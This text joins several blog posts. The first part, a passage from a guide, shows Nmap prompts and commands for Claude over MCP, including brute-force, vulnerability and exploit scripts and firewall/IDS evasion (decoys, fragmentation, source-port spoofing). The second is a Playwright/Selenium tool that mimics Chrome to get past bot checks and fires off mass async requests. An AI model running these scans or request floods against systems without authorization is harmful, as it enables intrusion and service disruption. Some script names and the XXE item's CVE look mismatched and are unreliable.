nmap -p 3306,5432,27017,6379 --script mysql-empty-password,pgsql-brute,mongodb-databases,redis-info example-target.com

16. WordPress Security Scan

Prompt:

If example-target.com runs WordPress, enumerate plugins, themes, and users, and check for known vulnerabilities.

What this does: WordPress-specific security assessment.

Expected NMAP command:

nmap -p 80,443 --script http-wordpress-enum,http-wordpress-users example-target.com

17. XML External Entity (XXE) Vulnerability

Prompt:

Test web services on example-target.com for XML External Entity (XXE) injection vulnerabilities.

What this does: Identifies XXE flaws in XML parsers.

Expected NMAP command:

nmap -p 80,443 --script http-vuln-cve2017-5638 example-target.com

18. SNMP Information Disclosure

Prompt:

Scan example-target.com for SNMP services (UDP port 161) and attempt to extract system information using common community strings.

What this does: SNMP can leak sensitive system information.

Expected NMAP command:

nmap -sU -p 161 --script snmp-brute,snmp-info example-target.com

19. RDP Security Assessment

Prompt:

Check if Remote Desktop Protocol (RDP) on example-target.com (port 3389) is vulnerable to known exploits like BlueKeep (CVE-2019-0708).

What this does: Critical Windows remote access security check.

Expected NMAP command:

nmap -p 3389 --script rdp-vuln-ms12-020,rdp-enum-encryption example-target.com

20. API Endpoint Discovery and Testing

Prompt:

Discover API endpoints on example-target.com and test for common API vulnerabilities including authentication bypass and information disclosure.

What this does: Identifies REST APIs and tests for common API security issues.

Expected NMAP command:

nmap -p 80,443,8080,8443 --script http-methods,http-auth-finder,http-devframework example-target.com

Part 4: Deep Dive Exercises

Deep Dive Exercise 1: Complete Web Application Security Assessment

Scenario: You need to perform a comprehensive security assessment of a web application running at webapp.example-target.com.

Claude Prompt:

I need a complete security assessment of webapp.example-target.com. Please:

1. First, discover all open ports and running services
2. Identify the web server software and version
3. Check for SSL/TLS vulnerabilities and certificate issues
4. Test for common web vulnerabilities (XSS, SQLi, CSRF)
5. Check security headers (CSP, HSTS, X-Frame-Options, etc.)
6. Enumerate web directories and interesting files
7. Test for backup file exposure (.bak, .old, .zip)
8. Check for sensitive information in robots.txt and sitemap.xml
9. Test HTTP methods for dangerous verbs (PUT, DELETE, TRACE)
10. Provide a prioritized summary of findings with remediation advice

Use timing template T3 (normal) to avoid overwhelming the target.

What Claude will do:

Claude will execute multiple NMAP scans in sequence, starting with discovery and progressively getting more detailed. Example commands it might run:

# Phase 1: Discovery
nmap -sV -T3 webapp.example-target.com

# Phase 2: SSL/TLS Analysis
nmap -p 443 -T3 --script ssl-cert,ssl-enum-ciphers,ssl-known-key,ssl-heartbleed,ssl-poodle,ssl-ccs-injection webapp.example-target.com

# Phase 3: Web Vulnerability Scanning
nmap -p 80,443 -T3 --script http-security-headers,http-csrf,http-sql-injection,http-stored-xss,http-dombased-xss webapp.example-target.com

# Phase 4: Directory and File Enumeration
nmap -p 80,443 -T3 --script http-enum,http-backup-finder webapp.example-target.com

# Phase 5: HTTP Methods Testing
nmap -p 80,443 -T3 --script http-methods --script-args http-methods.test-all webapp.example-target.com

Learning Outcomes:

  • Understanding layered security assessment methodology
  • How to interpret multiple scan results holistically
  • Prioritization of security findings by severity
  • Claude’s ability to correlate findings across multiple scans

Deep Dive Exercise 2: Network Perimeter Reconnaissance

Scenario: You’re assessing the security perimeter of an organization with the domain company.example-target.com and a known IP range 198.51.100.0/24.

Claude Prompt:

Perform comprehensive network perimeter reconnaissance for company.example-target.com (IP range 198.51.100.0/24). I need to:

1. Discover all live hosts in the IP range
2. For each live host, identify:
   - Operating system
   - All open ports (full 65535 range)
   - Service versions
   - Potential vulnerabilities
3. Map the network topology and identify:
   - Firewalls and filtering
   - DMZ hosts vs internal hosts
   - Critical infrastructure (DNS, mail, web servers)
4. Test for common network misconfigurations:
   - Open DNS resolvers
   - Open mail relays
   - Unauthenticated database access
   - Unencrypted management protocols (Telnet, FTP)
5. Provide a network map and executive summary

Use slow timing (T2) to minimize detection risk and avoid false positives.

What Claude will do:

# Phase 1: Host Discovery
nmap -sn -T2 198.51.100.0/24

# Phase 2: OS Detection on Live Hosts
nmap -O -T2 198.51.100.0/24

# Phase 3: Comprehensive Port Scan (may suggest splitting into chunks)
nmap -p- -T2 198.51.100.0/24

# Phase 4: Service Version Detection
nmap -sV -T2 198.51.100.0/24

# Phase 5: Specific Service Checks
nmap -p 53 --script dns-recursion 198.51.100.0/24
nmap -p 25 --script smtp-open-relay 198.51.100.0/24
nmap -p 3306,5432,27017 --script mysql-empty-password,pgsql-brute,mongodb-databases 198.51.100.0/24
nmap -p 23,21 198.51.100.0/24

# Phase 6: Vulnerability Scanning on Critical Hosts
nmap --script vuln -T2 [critical-hosts]

Learning Outcomes:

  • Large-scale network scanning strategies
  • How to handle and analyze results from multiple hosts
  • Network segmentation analysis
  • Risk assessment across an entire network perimeter
  • Understanding firewall and filtering detection

Deep Dive Exercise 3: Advanced Vulnerability Research – Zero-Day Hunting

Scenario: You’ve discovered a host running potentially vulnerable services and want to do deep reconnaissance to identify potential zero-day vulnerabilities or chained exploits.

Claude Prompt:

I've found a server at secure-server.example-target.com that's running multiple services. I need advanced vulnerability research:

1. Aggressive version fingerprinting of all services
2. Check for version-specific CVEs in detected software
3. Look for unusual port combinations that might indicate custom applications
4. Test for default credentials on all identified services
5. Check for known backdoors in the detected software versions
6. Test for authentication bypass vulnerabilities
7. Look for information disclosure issues (version strings, debug info, error messages)
8. Test for timing attacks and race conditions
9. Analyze for possible exploit chains (e.g., LFI -> RCE)
10. Provide detailed analysis with CVSS scores and exploit availability

Run this aggressively (-T4) as we have permission for intensive testing.

What Claude will do:

# Phase 1: Aggressive Fingerprinting
nmap -sV --version-intensity 9 -T4 secure-server.example-target.com

# Phase 2: All Vulnerability Scripts
nmap --script vuln,exploit -T4 secure-server.example-target.com

# Phase 3: Default Credential Testing
nmap --script auth -T4 secure-server.example-target.com

# Phase 4: Backdoor Detection
nmap --script backdoor-check,unusual-port -T4 secure-server.example-target.com

# Phase 5: Authentication Testing
nmap --script auth-bypass,brute -T4 secure-server.example-target.com

# Phase 6: Information Disclosure
nmap --script banner,http-errors,http-git,http-svn-enum -T4 secure-server.example-target.com

# Phase 7: Service-Specific Deep Dives
# (Claude will run targeted scripts based on discovered services)

After scans, Claude will:

  • Cross-reference detected versions with CVE databases
  • Explain potential exploit chains
  • Provide PoC (Proof of Concept) suggestions
  • Recommend remediation priorities
  • Suggest additional manual testing techniques

Learning Outcomes:

  • Advanced NSE scripting capabilities
  • How to correlate vulnerabilities for exploit chains
  • Understanding vulnerability severity and exploitability
  • Version-specific vulnerability research
  • Claude’s ability to provide context from its training data about specific CVEs

Part 5: Wide-Ranging Reconnaissance Exercises

Exercise 5.1: Subdomain Discovery and Mapping

Prompt:

Help me discover all subdomains of example-target.com and create a complete map of their infrastructure. For each subdomain found:
- Resolve its IP addresses
- Check if it's hosted on the same infrastructure
- Identify the services running
- Note any interesting or unusual findings

Also check for common subdomain patterns like api, dev, staging, admin, etc.

What this reveals: Shadow IT, forgotten dev servers, API endpoints, and the organization’s infrastructure footprint.

Exercise 5.2: API Security Testing

Prompt:

I've found an API at api.example-target.com. Please:
1. Identify the API type (REST, GraphQL, SOAP)
2. Discover all available endpoints
3. Test authentication mechanisms
4. Check for rate limiting
5. Test for IDOR (Insecure Direct Object References)
6. Look for excessive data exposure
7. Test for injection vulnerabilities
8. Check API versioning and test old versions for vulnerabilities
9. Verify CORS configuration
10. Test for JWT vulnerabilities if applicable

Exercise 5.3: Cloud Infrastructure Detection

Prompt:

Scan example-target.com to identify if they're using cloud infrastructure (AWS, Azure, GCP). Look for:
- Cloud-specific IP ranges
- S3 buckets or blob storage
- Cloud-specific services (CloudFront, Azure CDN, etc.)
- Misconfigured cloud resources
- Storage bucket permissions
- Cloud metadata services exposure

Exercise 5.4: IoT and Embedded Device Discovery

Prompt:

Scan the network 192.168.1.0/24 for IoT and embedded devices such as:
- IP cameras
- Smart TVs
- Printers
- Network attached storage (NAS)
- Home automation systems
- Industrial control systems (ICS/SCADA if applicable)

Check each device for:
- Default credentials
- Outdated firmware
- Unencrypted communications
- Exposed management interfaces

Exercise 5.5: Checking for Known Vulnerabilities and Old Software

Prompt:

Perform a comprehensive audit of example-target.com focusing on outdated and vulnerable software:

1. Detect exact versions of all running services
2. For each service, check if it's end-of-life (EOL)
3. Identify known CVEs for each version detected
4. Prioritize findings by:
   - CVSS score
   - Exploit availability
   - Exposure (internet-facing vs internal)
5. Check for:
   - Outdated TLS/SSL versions
   - Deprecated cryptographic algorithms
   - Unpatched web frameworks
   - Old CMS versions (WordPress, Joomla, Drupal)
   - Legacy protocols (SSLv3, TLS 1.0, weak ciphers)
6. Generate a remediation roadmap with version upgrade recommendations

Expected approach:

# Detailed version detection
nmap -sV --version-intensity 9 example-target.com

# Check for versionable services
nmap --script version,http-server-header,http-generator example-target.com

# SSL/TLS testing
nmap -p 443 --script ssl-cert,ssl-enum-ciphers,sslv2,ssl-date example-target.com

# CMS detection
nmap -p 80,443 --script http-wordpress-enum,http-joomla-brute,http-drupal-enum example-target.com

Claude will then analyze the results and provide:

  • A table of detected software with current versions and latest versions
  • CVE listings with severity scores
  • Specific upgrade recommendations
  • Risk assessment for each finding

Part 6: Advanced Tips and Techniques

6.1 Optimizing Scan Performance

Timing Templates:

  • -T0 (Paranoid): Extremely slow, for IDS evasion
  • -T1 (Sneaky): Slow, minimal detection risk
  • -T2 (Polite): Slower, less bandwidth intensive
  • -T3 (Normal): Default, balanced approach
  • -T4 (Aggressive): Faster, assumes good network
  • -T5 (Insane): Extremely fast, may miss results

Prompt:

Explain when to use each NMAP timing template and demonstrate the difference by scanning example-target.com with T2 and T4 timing.

6.2 Evading Firewalls and IDS

Prompt:

Scan example-target.com using techniques to evade firewalls and intrusion detection systems:
- Fragment packets
- Use decoy IP addresses
- Randomize scan order
- Use idle scan if possible
- Spoof MAC address (if on local network)
- Use source port 53 or 80 to bypass egress filtering

Expected command examples:

# Fragmented packets
nmap -f example-target.com

# Decoy scan
nmap -D RND:10 example-target.com

# Randomize hosts
nmap --randomize-hosts example-target.com

# Source port spoofing
nmap --source-port 53 example-target.com

6.3 Creating Custom NSE Scripts with Claude

Prompt:

Help me create a custom NSE script that checks for a specific vulnerability in our custom application running on port 8080. The vulnerability is that the /debug endpoint returns sensitive configuration data without authentication.

Claude can help you write Lua scripts for NMAP’s scripting engine!

6.4 Output Parsing and Reporting

Prompt:

Scan example-target.com and save results in all available formats (normal, XML, grepable, script kiddie). Then help me parse the XML output to extract just the critical and high severity findings for a report.

Expected command:

nmap -oA scan_results example-target.com

Claude can then help you parse the XML file programmatically.

Part 7: Responsible Disclosure and Next Steps

After Finding Vulnerabilities

  1. Document everything: Keep detailed records of your findings
  2. Prioritize by risk: Use CVSS scores and business impact
  3. Responsible disclosure: Follow the organization’s security policy
  4. Remediation tracking: Help create an action plan
  5. Verify fixes: Re-test after patches are applied

Using Claude for Post-Scan Analysis

Prompt:

I've completed my NMAP scans and found 15 vulnerabilities. Here are the results: [paste scan output]. 

Please:
1. Categorize by severity (Critical, High, Medium, Low, Info)
2. Explain each vulnerability in business terms
3. Provide remediation steps for each
4. Suggest a remediation priority order
5. Draft an executive summary for management
6. Create technical remediation tickets for the engineering team

Claude excels at translating technical scan results into actionable business intelligence.

Part 8: Continuous Monitoring with NMAP and Claude

Set up regular scanning routines and use Claude to track changes:

Prompt:

Create a baseline scan of example-target.com and save it. Then help me set up a cron job (or scheduled task) to run weekly scans and alert me to any changes in:
- New open ports
- Changed service versions
- New hosts discovered
- Changes in vulnerabilities detected

Conclusion

Combining NMAP’s powerful network scanning capabilities with Claude’s AI-driven analysis creates a formidable security assessment toolkit. The Model Context Protocol bridges these tools seamlessly, allowing you to:

  • Express complex scanning requirements in natural language
  • Get intelligent interpretation of scan results
  • Receive contextual security advice
  • Automate repetitive reconnaissance tasks
  • Learn security concepts through interactive exploration

Key Takeaways:

  1. Always get permission before scanning any network or system
  2. Start with gentle scans and progressively get more aggressive
  3. Use timing controls to avoid overwhelming targets or triggering alarms
  4. Correlate multiple scans for a complete security picture
  5. Leverage Claude’s knowledge to interpret results and suggest next steps
  6. Document everything for compliance and knowledge sharing
  7. Keep NMAP updated to benefit from the latest scripts and capabilities

The examples provided in this guide demonstrate just a fraction of what’s possible when combining NMAP with AI assistance. As you become more comfortable with this workflow, you’ll discover new ways to leverage Claude’s understanding to make your security assessments more efficient and comprehensive.

Additional Resources

About the Author: This guide was created to help security professionals and system administrators leverage AI assistance for more effective network reconnaissance and vulnerability assessment.

Last Updated: 2025-11-21

Version: 1.0

Building an advanced Browser Curl Script with Playwright and Selenium for load testing websites

Modern sites often block plain curl. Using a real browser engine (Chromium via Playwright) gives you true browser behavior: real TLS/HTTP2 stack, cookies, redirects, and JavaScript execution if needed. This post mirrors the functionality of the original browser_curl.sh wrapper but implemented with Playwright. It also includes an optional Selenium mini-variant at the end.

What this tool does

  • Sends realistic browser headers (Chrome-like)
  • Uses Chromium’s real network stack (HTTP/2, compression)
  • Manages cookies (persist to a file)
  • Follows redirects by default
  • Supports JSON and form POSTs
  • Async mode that returns immediately
  • --count N to dispatch N async requests for quick load tests

Note: Advanced bot defenses (CAPTCHAs, JS/ML challenges, strict TLS/HTTP2 fingerprinting) may still require full page automation and real user-like behavior. Playwright can do that too by driving real pages.

Setup

Run these once to install Playwright and Chromium:

npm init -y && \
npm install playwright && \
npx playwright install chromium

The complete Playwright CLI

Run this to create browser_playwright.mjs:

cat > browser_playwright.mjs << 'EOF'
#!/usr/bin/env node
import { chromium } from 'playwright';
import fs from 'fs';
import path from 'path';
import { spawn } from 'child_process';
const RED = '\u001b[31m';
const GRN = '\u001b[32m';
const YLW = '\u001b[33m';
const NC  = '\u001b[0m';
function usage() {
  const b = path.basename(process.argv[1]);
  console.log(`Usage: ${b} [OPTIONS] URL
Advanced HTTP client using Playwright (Chromium) with browser-like behavior.
OPTIONS:
  -X, --method METHOD        HTTP method (GET, POST, PUT, DELETE) [default: GET]
  -d, --data DATA            Request body
  -H, --header HEADER        Add custom header (repeatable)
  -o, --output FILE          Write response body to file
  -c, --cookie FILE          Cookie storage file [default: /tmp/pw_cookies_<pid>.json]
  -A, --user-agent UA        Custom User-Agent
  -t, --timeout SECONDS      Request timeout [default: 30]
      --async                Run request(s) in background
      --count N              Number of async requests to fire [default: 1, requires --async]
      --no-redirect          Do not follow redirects (best-effort)
      --show-headers         Print response headers
      --json                 Send data as JSON (sets Content-Type)
      --form                 Send data as application/x-www-form-urlencoded
  -v, --verbose              Verbose output
  -h, --help                 Show this help message
EXAMPLES:
  ${b} https://example.com
  ${b} --async https://example.com
  ${b} -X POST --json -d '{"a":1}' https://httpbin.org/post
  ${b} --async --count 10 https://httpbin.org/get
`);
}
function parseArgs(argv) {
  const args = { method: 'GET', async: false, count: 1, followRedirects: true, showHeaders: false, timeout: 30, data: '', contentType: '', cookieFile: '', verbose: false, headers: [], url: '' };
  for (let i = 0; i < argv.length; i++) {
    const a = argv[i];
    switch (a) {
      case '-X': case '--method': args.method = String(argv[++i] || 'GET'); break;
      case '-d': case '--data': args.data = String(argv[++i] || ''); break;
      case '-H': case '--header': args.headers.push(String(argv[++i] || '')); break;
      case '-o': case '--output': args.output = String(argv[++i] || ''); break;
      case '-c': case '--cookie': args.cookieFile = String(argv[++i] || ''); break;
      case '-A': case '--user-agent': args.userAgent = String(argv[++i] || ''); break;
      case '-t': case '--timeout': args.timeout = Number(argv[++i] || '30'); break;
      case '--async': args.async = true; break;
      case '--count': args.count = Number(argv[++i] || '1'); break;
      case '--no-redirect': args.followRedirects = false; break;
      case '--show-headers': args.showHeaders = true; break;
      case '--json': args.contentType = 'application/json'; break;
      case '--form': args.contentType = 'application/x-www-form-urlencoded'; break;
      case '-v': case '--verbose': args.verbose = true; break;
      case '-h': case '--help': usage(); process.exit(0);
      default:
        if (!args.url && !a.startsWith('-')) args.url = a; else {
          console.error(`${RED}Error: Unknown argument: ${a}${NC}`);
          process.exit(1);
        }
    }
  }
  return args;
}
function parseHeaderList(list) {
  const out = {};
  for (const h of list) {
    const idx = h.indexOf(':');
    if (idx === -1) continue;
    const name = h.slice(0, idx).trim();
    const value = h.slice(idx + 1).trim();
    if (!name) continue;
    out[name] = value;
  }
  return out;
}
function buildDefaultHeaders(userAgent) {
  const ua = userAgent || 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36';
  return {
    'User-Agent': ua,
    'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8',
    'Accept-Language': 'en-US,en;q=0.9',
    'Accept-Encoding': 'gzip, deflate, br',
    'Connection': 'keep-alive',
    'Upgrade-Insecure-Requests': '1',
    'Sec-Fetch-Dest': 'document',
    'Sec-Fetch-Mode': 'navigate',
    'Sec-Fetch-Site': 'none',
    'Sec-Fetch-User': '?1',
    'Cache-Control': 'max-age=0'
  };
}
async function performRequest(opts) {
  // Cookie file handling
  const defaultCookie = `/tmp/pw_cookies_${process.pid}.json`;
  const cookieFile = opts.cookieFile || defaultCookie;
  // Launch Chromium
  const browser = await chromium.launch({ headless: true });
  const extraHeaders = { ...buildDefaultHeaders(opts.userAgent), ...parseHeaderList(opts.headers) };
  if (opts.contentType) extraHeaders['Content-Type'] = opts.contentType;
  const context = await browser.newContext({ userAgent: extraHeaders['User-Agent'], extraHTTPHeaders: extraHeaders });
  // Load cookies if present
  if (fs.existsSync(cookieFile)) {
    try {
      const ss = JSON.parse(fs.readFileSync(cookieFile, 'utf8'));
      if (ss.cookies?.length) await context.addCookies(ss.cookies);
    } catch {}
  }
  const request = context.request;
  // Build request options
  const reqOpts = { headers: extraHeaders, timeout: opts.timeout * 1000 };
  if (opts.data) {
    // Playwright will detect JSON strings vs form strings by headers
    reqOpts.data = opts.data;
  }
  if (opts.followRedirects === false) {
    // Best-effort: limit redirects to 0
    reqOpts.maxRedirects = 0;
  }
  const method = opts.method.toUpperCase();
  let resp;
  try {
    if (method === 'GET') resp = await request.get(opts.url, reqOpts);
    else if (method === 'POST') resp = await request.post(opts.url, reqOpts);
    else if (method === 'PUT') resp = await request.put(opts.url, reqOpts);
    else if (method === 'DELETE') resp = await request.delete(opts.url, reqOpts);
    else if (method === 'PATCH') resp = await request.patch(opts.url, reqOpts);
    else {
      console.error(`${RED}Unsupported method: ${method}${NC}`);
      await browser.close();
      process.exit(2);
    }
  } catch (e) {
    console.error(`${RED}[ERROR] ${e?.message || e}${NC}`);
    await browser.close();
    process.exit(3);
  }
  // Persist cookies
  try {
    const state = await context.storageState();
    fs.writeFileSync(cookieFile, JSON.stringify(state, null, 2));
  } catch {}
  // Output
  const status = resp.status();
  const statusText = resp.statusText();
  const headers = await resp.headers();
  const body = await resp.text();
  if (opts.verbose) {
    console.error(`${YLW}Request: ${method} ${opts.url}${NC}`);
    console.error(`${YLW}Headers: ${JSON.stringify(extraHeaders)}${NC}`);
  }
  if (opts.showHeaders) {
    // Print a simple status line and headers to stdout before body
    console.log(`HTTP ${status} ${statusText}`);
    for (const [k, v] of Object.entries(headers)) {
      console.log(`${k}: ${v}`);
    }
    console.log('');
  }
  if (opts.output) {
    fs.writeFileSync(opts.output, body);
  } else {
    process.stdout.write(body);
  }
  if (!resp.ok()) {
    console.error(`${RED}[ERROR] HTTP ${status} ${statusText}${NC}`);
    await browser.close();
    process.exit(4);
  }
  await browser.close();
}
async function main() {
  const argv = process.argv.slice(2);
  const opts = parseArgs(argv);
  if (!opts.url) { console.error(`${RED}Error: URL is required${NC}`); usage(); process.exit(1); }
  if ((opts.count || 1) > 1 && !opts.async) {
    console.error(`${RED}Error: --count requires --async${NC}`);
    process.exit(1);
  }
  if (opts.count < 1 || !Number.isInteger(opts.count)) {
    console.error(`${RED}Error: --count must be a positive integer${NC}`);
    process.exit(1);
  }
  if (opts.async) {
    // Fire-and-forget background processes
    const baseArgs = process.argv.slice(2).filter(a => a !== '--async' && !a.startsWith('--count'));
    const pids = [];
    for (let i = 0; i < opts.count; i++) {
      const child = spawn(process.execPath, [process.argv[1], ...baseArgs], { detached: true, stdio: 'ignore' });
      pids.push(child.pid);
      child.unref();
    }
    if (opts.verbose) {
      console.error(`${YLW}[ASYNC] Spawned ${opts.count} request(s).${NC}`);
    }
    if (opts.count === 1) console.error(`${GRN}[ASYNC] Request started with PID: ${pids[0]}${NC}`);
    else console.error(`${GRN}[ASYNC] ${opts.count} requests started with PIDs: ${pids.join(' ')}${NC}`);
    process.exit(0);
  }
  await performRequest(opts);
}
main().catch(err => {
  console.error(`${RED}[FATAL] ${err?.stack || err}${NC}`);
  process.exit(1);
});
EOF
chmod +x browser_playwright.mjs

Optionally, move it into your PATH:

sudo mv browser_playwright.mjs /usr/local/bin/browser_playwright

Quick start

  • Simple GET:
node browser_playwright.mjs https://example.com
  • Async GET (returns immediately):
node browser_playwright.mjs --async https://example.com
  • Fire 100 async requests in one command:
node browser_playwright.mjs --async --count 100 https://httpbin.org/get

  • POST JSON:
node browser_playwright.mjs -X POST --json \
  -d '{"username":"user","password":"pass"}' \
  https://httpbin.org/post
  • POST form data:
node browser_playwright.mjs -X POST --form \
  -d "username=user&password=pass" \
  https://httpbin.org/post
  • Include response headers:
node browser_playwright.mjs --show-headers https://example.com
  • Save response to a file:
node browser_playwright.mjs -o response.json https://httpbin.org/json
  • Custom headers:
node browser_playwright.mjs \
  -H "X-API-Key: your-key" \
  -H "Authorization: Bearer token" \
  https://httpbin.org/headers
  • Persistent cookies across requests:
COOKIE_FILE="playwright_session.json"
# Login and save cookies
node browser_playwright.mjs -c "$COOKIE_FILE" \
  -X POST --form \
  -d "user=test&pass=secret" \
  https://httpbin.org/post > /dev/null
# Authenticated-like follow-up (cookie file reused)
node browser_playwright.mjs -c "$COOKIE_FILE" \
  https://httpbin.org/cookies

Load testing patterns

  • Simple load test with --count:
node browser_playwright.mjs --async --count 100 https://httpbin.org/get
  • Loop-based alternative:
for i in {1..100}; do
  node browser_playwright.mjs --async https://httpbin.org/get
done
  • Timed load test:
cat > pw_load_for_duration.sh << 'EOF'
#!/usr/bin/env bash
URL="${1:-https://httpbin.org/get}"
DURATION="${2:-60}"
COUNT=0
END_TIME=$(($(date +%s) + DURATION))
while [ "$(date +%s)" -lt "$END_TIME" ]; do
  node browser_playwright.mjs --async "$URL" >/dev/null 2>&1
  ((COUNT++))
done
echo "Sent $COUNT requests in $DURATION seconds"
echo "Rate: $((COUNT / DURATION)) requests/second"
EOF
chmod +x pw_load_for_duration.sh
./pw_load_for_duration.sh https://httpbin.org/get 30
  • Parameterized load test:
cat > pw_load_test.sh << 'EOF'
#!/usr/bin/env bash
URL="${1:-https://httpbin.org/get}"
REQUESTS="${2:-50}"
echo "Load testing: $URL"
echo "Requests: $REQUESTS"
echo ""
START=$(date +%s)
node browser_playwright.mjs --async --count "$REQUESTS" "$URL"
echo ""
echo "Dispatched in $(($(date +%s) - START)) seconds"
EOF
chmod +x pw_load_test.sh
./pw_load_test.sh https://httpbin.org/get 200

Options reference

  • -X, --method HTTP method (GET/POST/PUT/DELETE/PATCH)
  • -d, --data Request body
  • -H, --header Add extra headers (repeatable)
  • -o, --output Write response body to file
  • -c, --cookie Cookie file to use (and persist)
  • -A, --user-agent Override User-Agent
  • -t, --timeout Max request time in seconds (default 30)
  • --async Run request(s) in the background
  • --count N Fire N async requests (requires --async)
  • --no-redirect Best-effort disable following redirects
  • --show-headers Include response headers before body
  • --json Sets Content-Type: application/json
  • --form Sets Content-Type: application/x-www-form-urlencoded
  • -v, --verbose Verbose diagnostics

Validation rules:

  • --count requires --async
  • --count must be a positive integer

Under the hood: why this works better than plain curl

  • Real Chromium network stack (HTTP/2, TLS, compression)
  • Browser-like headers and a true User-Agent
  • Cookie jar via Playwright context storageState
  • Redirect handling by the browser stack

This helps pass simplistic bot checks and more closely resembles real user traffic.

Real-world examples

  • API-style auth flow (demo endpoints):
cat > pw_auth_flow.sh << 'EOF'
#!/usr/bin/env bash
COOKIE_FILE="pw_auth_session.json"
BASE="https://httpbin.org"
echo "Login (simulated form POST)..."
node browser_playwright.mjs -c "$COOKIE_FILE" \
  -X POST --form \
  -d "user=user&pass=pass" \
  "$BASE/post" > /dev/null
echo "Fetch cookies..."
node browser_playwright.mjs -c "$COOKIE_FILE" \
  "$BASE/cookies"
echo "Load test a protected-like endpoint..."
node browser_playwright.mjs -c "$COOKIE_FILE" \
  --async --count 20 \
  "$BASE/get"
echo "Done"
rm -f "$COOKIE_FILE"
EOF
chmod +x pw_auth_flow.sh
./pw_auth_flow.sh
  • Scraping with rate limiting:
cat > pw_scrape.sh << 'EOF'
#!/usr/bin/env bash
URLS=(
  "https://example.com/"
  "https://example.com/"
  "https://example.com/"
)
for url in "${URLS[@]}"; do
  echo "Fetching: $url"
  node browser_playwright.mjs -o "$(echo "$url" | sed 's#[/:]#_#g').html" "$url"
  sleep 2
done
EOF
chmod +x pw_scrape.sh
./pw_scrape.sh
  • Health check monitoring:
cat > pw_health.sh << 'EOF'
#!/usr/bin/env bash
ENDPOINT="${1:-https://httpbin.org/status/200}"
while true; do
  if node browser_playwright.mjs "$ENDPOINT" >/dev/null 2>&1; then
    echo "$(date): Service healthy"
  else
    echo "$(date): Service unhealthy"
  fi
  sleep 30
done
EOF
chmod +x pw_health.sh
./pw_health.sh

  • Hanging or quoting issues: ensure your shell quoting is balanced. Prefer simple commands without complex inline quoting.
  • Verbose mode too noisy: omit -v in production.
  • Cookie file format: the script writes Playwright storageState JSON. It’s safe to keep or delete.
  • 403 errors: site uses stronger protections. Drive a real page (Playwright page.goto) and interact, or solve CAPTCHAs where required.

Performance notes

Dispatch time depends on process spawn and Playwright startup. For higher throughput, consider reusing the same Node process to issue many requests (modify the script to loop internally) or use k6/Locust/Artillery for large-scale load testing.

Limitations

  • This CLI uses Playwright’s HTTP client bound to a Chromium context. It is much closer to real browsers than curl, but some advanced fingerprinting still detects automation.
  • WebSocket flows, MFA, or complex JS challenges generally require full page automation (which Playwright supports).

When to use what

  • Use this Playwright CLI when you need realistic browser behavior, cookies, and straightforward HTTP requests with quick async dispatch.
  • Use full Playwright page automation for dynamic content, complex logins, CAPTCHAs, and JS-heavy sites.

Advanced combos

  • With jq for JSON processing:
node browser_playwright.mjs https://httpbin.org/json | jq '.slideshow.title'
  • With parallel for concurrency:
echo -e "https://httpbin.org/get\nhttps://httpbin.org/headers" | \
parallel -j 5 "node browser_playwright.mjs -o {#}.json {}"
  • With watch for monitoring:
watch -n 5 "node browser_playwright.mjs https://httpbin.org/status/200 >/dev/null && echo ok || echo fail"
  • With xargs for batch processing:
echo -e "1\n2\n3" | xargs -I {} node browser_playwright.mjs "https://httpbin.org/anything/{}"

Future enhancements

  • Built-in rate limiting and retry logic
  • Output modes (JSON-only, headers-only)
  • Proxy support
  • Response assertions (status codes, content patterns)
  • Metrics collection (timings, success rates)

Minimal Selenium variant (Python)

If you prefer Selenium, here’s a minimal GET/headers/redirect/cookie-capable script. Note: issuing cross-origin POST bodies is more ergonomic with Playwright’s request client; Selenium focuses on page automation.

Install Selenium:

python3 -m venv .venv && source .venv/bin/activate
pip install --upgrade pip selenium

Create browser_selenium.py:

cat > browser_selenium.py << 'EOF'
#!/usr/bin/env python3
import argparse, json, os, sys, time
from selenium import webdriver
from selenium.webdriver.chrome.options import Options
RED='\033[31m'; GRN='\033[32m'; YLW='\033[33m'; NC='\033[0m'
def parse_args():
    p = argparse.ArgumentParser(description='Minimal Selenium GET client')
    p.add_argument('url')
    p.add_argument('-o','--output')
    p.add_argument('-c','--cookie', default=f"/tmp/selenium_cookies_{os.getpid()}.json")
    p.add_argument('--show-headers', action='store_true')
    p.add_argument('-t','--timeout', type=int, default=30)
    p.add_argument('-A','--user-agent')
    p.add_argument('-v','--verbose', action='store_true')
    return p.parse_args()
args = parse_args()
opts = Options()
opts.add_argument('--headless=new')
if args.user_agent:
    opts.add_argument(f'--user-agent={args.user_agent}')
with webdriver.Chrome(options=opts) as driver:
    driver.set_page_load_timeout(args.timeout)
    # Load cookies if present (domain-specific; best-effort)
    if os.path.exists(args.cookie):
        try:
            ck = json.load(open(args.cookie))
            for c in ck.get('cookies', []):
                try:
                    driver.get('https://' + c.get('domain').lstrip('.'))
                    driver.add_cookie({
                        'name': c['name'], 'value': c['value'], 'path': c.get('path','/'),
                        'domain': c.get('domain'), 'secure': c.get('secure', False)
                    })
                except Exception:
                    pass
        except Exception:
            pass
    driver.get(args.url)
    # Persist cookies (best-effort)
    try:
        cookies = driver.get_cookies()
        json.dump({'cookies': cookies}, open(args.cookie, 'w'), indent=2)
    except Exception:
        pass
    if args.output:
        open(args.output, 'w').write(driver.page_source)
    else:
        sys.stdout.write(driver.page_source)
EOF
chmod +x browser_selenium.py

Use it:

./browser_selenium.py https://example.com > out.html

Conclusion

You now have a Playwright-powered CLI that mirrors the original curl-wrapper’s ergonomics but uses a real browser engine, plus a minimal Selenium alternative. Use the CLI for realistic headers, cookies, redirects, JSON/form POSTs, and async dispatch with --count. For tougher sites, scale up to full page automation with Playwright.

Resources

Building a Browser Curl Wrapper for Reliable HTTP Requests and Load Testing

Modern websites deploy bot defenses that can block plain curl or naive scripts. In many cases, adding the right browser-like headers, HTTP/2, cookie persistence, and compression gets you past basic filters without needing a full browser.

This post walks through a small shell utility, browser_curl.sh, that wraps curl with realistic browser behavior. It also supports “fire-and-forget” async requests and a --count flag to dispatch many requests at once for quick load tests.

What this script does

  • Sends browser-like headers (Chrome on macOS)
  • Uses HTTP/2 and compression
  • Manages cookies automatically (cookie jar)
  • Follows redirects by default
  • Supports JSON and form POSTs
  • Async mode that returns immediately
  • --count N to dispatch N async requests in one command

